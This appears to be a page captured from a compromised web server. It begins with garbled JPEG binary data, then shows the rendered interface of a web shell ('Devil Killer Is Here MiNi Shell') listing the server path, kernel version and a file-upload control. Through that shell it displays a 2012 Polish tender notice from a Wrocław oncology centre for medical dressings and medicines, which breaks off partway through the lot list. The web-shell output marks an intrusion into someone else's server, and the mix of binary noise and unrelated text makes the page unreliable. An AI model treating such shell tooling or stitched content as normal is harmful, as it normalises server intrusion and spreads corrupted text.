JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121201/484094-N-2012.html

<p class="kh_header"><b>Wrocław: sukcesywną dostawę wyrobów medycznych z kategorii opatrunki, tamponów ginekologicznych oraz  produktów leczniczych - 43 zadania</b><br>
<b>Numer ogłoszenia: 484094 - 2012; data zamieszczenia: 01.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Onkologii we Wrocławiu , pl. Hirszfelda 12, 53-413 Wrocław, woj. dolnośląskie, tel. 71 3689584, faks 71 36 89 583; 36 89 234.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dco.com.pl, www.przetargipubliczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dco.com.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywną dostawę wyrobów medycznych z kategorii opatrunki, tamponów ginekologicznych oraz  produktów leczniczych - 43 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> sukcesywną dostawę wyrobów medycznych z kategorii opatrunki, tamponów ginekologicznych oraz  produktów leczniczych - 43 zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.77.11.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości łącznie 4988,00 zł (cztery tysiące dziewięćset osiemdziesiąt osiem zł), a dla poszczególnych zadań zgodnie z tabelą podaną poniżej: 
Nr zadania	Wysokość wadium	Nr zadania	Wysokość wadium	Nr zadania	Wysokość wadium
1 -38;	16 -139;	31 -2;
2 -206;	17 -7;	32 -9;
3 -826;	18 -24;	33 -5;
4 -868;	19 -7;	34 -5;
5 -626;	20 -18;	35 -5;
6 -267;	21 -10;	36 -13;
7 -621;	22 -26;	37 -34;
8 -32;	23 -157;	38 -12;
9 -67;	24 -77;	39 -10;
10 -4;	25 -73;	40 -13;
11 -68;	26 -14;	41 -6;
12 -13;	27 -19;	42 -17;
13 -59;	28 -36;	43 -17;
14 -62;	29 -363;		
15 -82;	30 -31;</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ustawy- Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ustawy- Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ustawy- Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ustawy- Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie zdolności finansowej zapewniającej wykonanie zamówienia tj. wykazanie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum -  dla całości zamówienia 115 470,00  zł. W  przypadku złożenia oferty na więcej niż jedno zadanie kwotę ubezpieczenia należy zsumować, kwoty dla poszczególnych zadań podano poniżej
1 -	889;
2 -	4778;
3 -	19120;
4 -	20093;
5 -	14481;
6 -	6190;
7 -	14370;
8 -	750;
9 -	1556;
10 -	102;
11 -	1577;
12 -	300;
13 -	1375;
14 -	1444;
15 -	1899;
16 -	3207;
17 -	156;
18 -	544;
19 -	166;
20 -	420;
21 -	222;
22 -	610;
23 -	3636;
24 -	1778;
25 -	1681;
26 -	329;
27 -	448;
28 -	832;
29 -	8400;
30 -	722;
31 -	44;
32 -	207;
33 -	119;
34 -	112;
35 -	125;
36 -	295;
37 -	792;
38 -	267;
39 -	231;
40 -	311;
41 -	130;
42 -	382;
43 -	383;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ważna na dzień składania ofert koncesja lub zezwolenie na prowadzenie hurtowni farmaceutycznej, która w świetle obowiązującego prawa w Rzeczpospolitej Polskiej uprawnia Wykonawcę zamówienia do prowadzenia obrotu produktami leczniczymi - w przypadku zaoferowania przez Wykonawcę produktów leczniczych.
2.W przypadku wyrobów medycznych, zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. Nr 107, poz. 679), Zamawiający żąda oświadczenia Wykonawcy, że będzie posiadał aktualne i ważne przez cały okres trwania umowy dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu CE wydanego przez jednostkę notyfikacyjną (jeżeli dotyczy)).
3.W przypadku Atestów lub innych świadectw dopuszczenia do obrotu wydanych przez Państwowy Zakład Higieny lub inne uprawnione instytucje - dot. zadania 30, tj. tamponów ginekologicznych, Zamawiający żąda oświadczenia Wykonawcy, że będzie posiadał aktualne i ważne przez cały okres trwania umowy atesty lub inne świadectwa dopuszczenia do obrotu wydanych przez Państwowy Zakład Higieny lub inne uprawnione instytucje.
4.Odpowiednie katalogi, foldery lub materiały źródłowe producenta w czytelny i jasny sposób potwierdzające spełnianie parametrów techniczno-użytkowych opisanych przez Zamawiającego w Załączniku Nr 1 do SIWZ. 
Do każdej pozycji wykazu, wykonawca umieści dodatkowo opis której pozycji załącznika nr 1 on dotyczy, np. zał. Nr 1 zad. 1 itd.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>9.2. 	Zamawiający przewiduje możliwość dokonania zmiany umowy z powodu okoliczności, których nie można było przewidzieć w chwili zawarcia umowy oraz w każdym przypadku, kiedy zmiany umowy są korzystne dla Zamawiającego. 
9.3. 	Ewentualne spory wynikłe z wykonania umowy rozstrzygane będą przez Sąd właściwy dla siedziby Zamawiającego.
9.4. 	Strony dopuszczają możliwość zmiany umowy w sytuacjach opisanych w § 4 i w § 5 oraz w ust. 2 niniejszego paragrafu, a ponadto na wniosek jednej ze stron dotyczący zmiany terminu zakończenia realizacji umowy w przypadku niewyczerpania ilości danego asortymentu objętego niniejszą umową.
9.5. 	Zmiany do umowy,  wprowadza się w formie aneksu, na pisemny wniosek zawierający uzasadnienie. Aneks nie jest wymagany w sytuacjach gdy umowa tak stanowi.  
9.6. 	W przypadku gdy Zamawiający realizować będzie w ramach zamówień wspólnych  po myśli art. 16  PZP określoną pozycję/określone pozycje asortymentu  z załącznika nr 1 do umowy, jest on uprawniony do rozwiązania umowy  z  3 - miesięcznym okresem wypowiedzenia w zakresie przedmiotowego asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dco.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Onkologii we Wrocławiu Dział Zamówień Publicznych i Logistyki
Pl. Hirszfelda 12 53-413 Wrocław
z dopiskiem: postępowanie nr ZP-PN-73-12-LA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 10:00, miejsce: Dolnośląskim Centrum Onkologii, pl. Hirszfelda 12, 53-413 Wrocław, budynek H (Przychodnia), III piętro, pok. 312.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GAZA   BAWELNIANA  13-nitkowa  o  szer.  90  cm 	mb	3 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GAZA   BAWELNIANA  13-nitkowa  o  szer.  90  cm 	mb	3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KOMPRESY Z  GAZY 17-nitkowe niewyjał.,z nitką radiacyjną,16 warstwowe wym.10cm*20cm	szt.	30 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY Z  GAZY 17-nitkowe niewyjał.,z nitką radiacyjną,16 warstwowe wym.10cm*20cm	szt.	30 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KOMPRESY Z  GAZY 17-nitkowe niewyjał.,z nitką radiacyjną 12 warstwowe wym.10cm*10cm	szt.	350 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY Z  GAZY 17-nitkowe niewyjał.,z nitką radiacyjną 12 warstwowe wym.10cm*10cm	szt.	350 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KOMPRESY Z  GAZY 13-nitkowe niewyjał. 8 warstwowe wym.10cm*10cm	szt.	690 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY Z  GAZY 13-nitkowe niewyjał. 8 warstwowe wym.10cm*10cm	szt.	690 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KOMPRESY Z GAZY13-nitkowe niewyjał. 8 warstwowe wym 7.5cm*7.5 cm	szt.	850 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY Z GAZY13-nitkowe niewyjał. 8 warstwowe wym 7.5cm*7.5 cm	szt.	850 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KOMPRESY Z GAZY 13-nitkowe niewyjał. 8 warstwowe wym.5cm*5cm	szt.	700 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY Z GAZY 13-nitkowe niewyjał. 8 warstwowe wym.5cm*5cm	szt.	700 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> WATA  CELULOZOWA W  PŁATACH BIELONA	kg	5 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WATA  CELULOZOWA W  PŁATACH BIELONA	kg	5 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OPASKA  DZIANA    PODTRZYMUJACA   wym  4  m*15cm	szt.	4 500.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPASKA  DZIANA    PODTRZYMUJACA   wym  4  m*15cm	szt.	4 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> OPASKA  DZIANA    PODTRZYMUJACA   wym 4  m*10cm	szt.	14 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPASKA  DZIANA    PODTRZYMUJACA   wym 4  m*10cm	szt.	14 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> OPASKA  DZIANA    PODTRZYMUJACA  wym 4  m*5cm	szt.	1 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPASKA  DZIANA    PODTRZYMUJACA  wym 4  m*5cm	szt.	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> OPASKA  ELASTYCZNA .TK  Z ZAPINKĄ  wymiar (długości w stanie rozciągniętym) 4 m *15 cm lub 5 m *15 cm	szt.	2 600.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPASKA  ELASTYCZNA .TK  Z ZAPINKĄ  wymiar (długości w stanie rozciągniętym) 4 m *15 cm lub 5 m *15 cm	szt.	2 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY, PAKOWANY POJEDYŃCZO wym 5cm x 7,2cm	szt.	6 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY, PAKOWANY POJEDYŃCZO wym 5cm x 7,2cm	szt.	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
